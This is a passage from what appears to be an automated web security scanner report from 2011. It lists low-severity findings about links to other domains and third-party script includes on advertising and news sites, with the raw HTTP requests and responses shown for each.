Cookie: opt-out=true; __utma=243159559.560300423.1315133971.1315133971.1315133971.1; __utmb=243159559.2.10.1315133971; __utmc=243159559; __utmz=243159559.1315133971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:08:33 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Cache-Control: private
Content-Type: image/gif; charset=utf-8
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.114. http://www.tidaltv.com/optout/verfiyoptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /optout/verfiyoptout.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout/verfiyoptout.ashx?nocache=0.8995159 HTTP/1.1
Host: www.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmb=243159559.2.10.1315133971; __utmc=243159559; opt-out=true

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:35:57 GMT
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Cache-Control: private
Content-Type: image/gif; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>

21.115. http://www.tribalfusion.com/optout/verify.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /optout/verify.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /optout/verify.js?nocache=0.1396377 HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Etag: "9dMQvRLDm58"
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 10:59:00 GMT
Last-Modified: Fri, 19 Dec 2008 20:18:49 GMT
Server: Resin/3.1.8
Content-Type: application/x-javascript
Content-Length: 545

document.write('<scr'+'ipt src="http://www.tribalfusion.com/test/opt.js"></scr'+'ipt>');
function OPT_DO ()
{
if(TFID == 'optout')
{
document.write('<img src="http://www.networkadvertising.org/verify/cookie_optout.gif" width="239" height="45">');
}
else if(TFID == 'noid')
{
document.write('<img src="http://www.networkadvertising.org/verify/no_cookie.gif" width="239" height="45">');
}
else
{
document.write('<img src="http://www.networkadvertising.org/verify/cookie_exists.gif" width="239" height="45">');
}


}

22. Cross-domain script include  previous  next
There are 125 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


22.1. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad-apac.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/banner/index_b5.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5496
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:27:14 GMT
Expires: Sun, 04 Sep 2011 02:27:14 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Sep 14 05:50:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

22.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.250

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6296.126265.CASALE/B5641720.250;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88918/;ord=458952158 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88918/233260/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5815
Date: Sun, 04 Sep 2011 02:25:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Aug 25 10:49:22 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5641720&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=68132397&advid=3257730&sid=953446&adid=&btreg=DCF242908621&btsvrreg=doubleclick'></script>
...[SNIP]...

22.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.126265.CASALE/B5641720.306

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6296.126265.CASALE/B5641720.306;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88958/;ord=589625147 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88958/233224/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5996
Date: Sun, 04 Sep 2011 02:27:22 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Aug 16 09:52:51 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5641720&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=68132545&advid=3257730&sid=953446&adid=&btreg=DCF242905086&btsvrreg=doubleclick'></script>
...[SNIP]...

22.4. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:10:14 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R03V9O106Bs|O108EZ|O108Ea|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>

22.5. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO206Bs|O108EZ|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800699', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

22.6. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:50 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02dtO206Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>

22.7. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:10:40 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804619', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

22.8. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:27 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO306Bs|O108EZ|O108KY; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800700', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

22.9. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:58 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO106Bq|O306Bs|O108EZ|O108Ea|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "4";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>

22.10. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:48 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02xiO306Bq|O306Bs|O108FG|O108KY|O108i0; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '804611', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

22.11. https://asia.citi.com/india/rca/send_money_to_india.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://asia.citi.com
Path:   /india/rca/send_money_to_india.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /india/rca/send_money_to_india.htm HTTP/1.1
Host: asia.citi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:27 GMT
Server:
Content-Length: 23160
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script language="javascript" src="https://www.online.citibank.co.in/portal/newgen/js/lms.js"></script>
...[SNIP]...

22.12. http://core.videoegg.com/eap/14533/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/14533/html/jstags.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eap/14533/html/jstags.html?CCID=1977158-1&r=0.35500167799182236 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1918458103-1315103284399

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314219624"
Last-Modified: Wed, 24 Aug 2011 17:19:34 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:17:51 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.13. http://core.videoegg.com/eap/latest/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/latest/html/jstags.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eap/latest/html/jstags.html?CCID=1242772-1&r=0.7754915065597743 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314921396"
Last-Modified: Thu, 01 Sep 2011 23:42:44 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:08:07 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

22.14. http://cps.regis.edu/lp/computer_degree/it_degree.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cps.regis.edu
Path:   /lp/computer_degree/it_degree.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lp/computer_degree/it_degree.php HTTP/1.1
Host: cps.regis.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: max-age=1, private, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 13859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script type="text/javascript" src="http://callanalytics.engineready.com/euinc/number-changer.js"></script>

<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/eu/ywa.js"></script>
<script type="text/javascript" src="http://refertoregis.org/javascript-libraries/conversion-analyst/CA-instantiate-basecode-ver5-LP.js"></script>
...[SNIP]...
<!-- added 4-18-2011 JR -->
<script type='text/javascript' src='http://refertoregis.org/javascript-libraries/elqNow/elqCfg.js'></script>
<script type='text/javascript' src='http://refertoregis.org/javascript-libraries/elqNow/elqImg.js'></script>

<!-- Audience Science tracking code. Added 8-3-2011 JR -->
<script type="text/javascript"
src="http://js.revsci.net/gateway/gw.js?csid=H11215&amp;auto=t">
</script>
...[SNIP]...

22.15. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851:933,196008|1,1#0,24:0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:31:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1185,589,14:767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:826,471,14:767,4,14:1185,833,14:933,56,15:1302,202,9:305,825,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1:1:1:1:1:0:1:0:0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=181
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:37 GMT
Content-Length: 3656
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
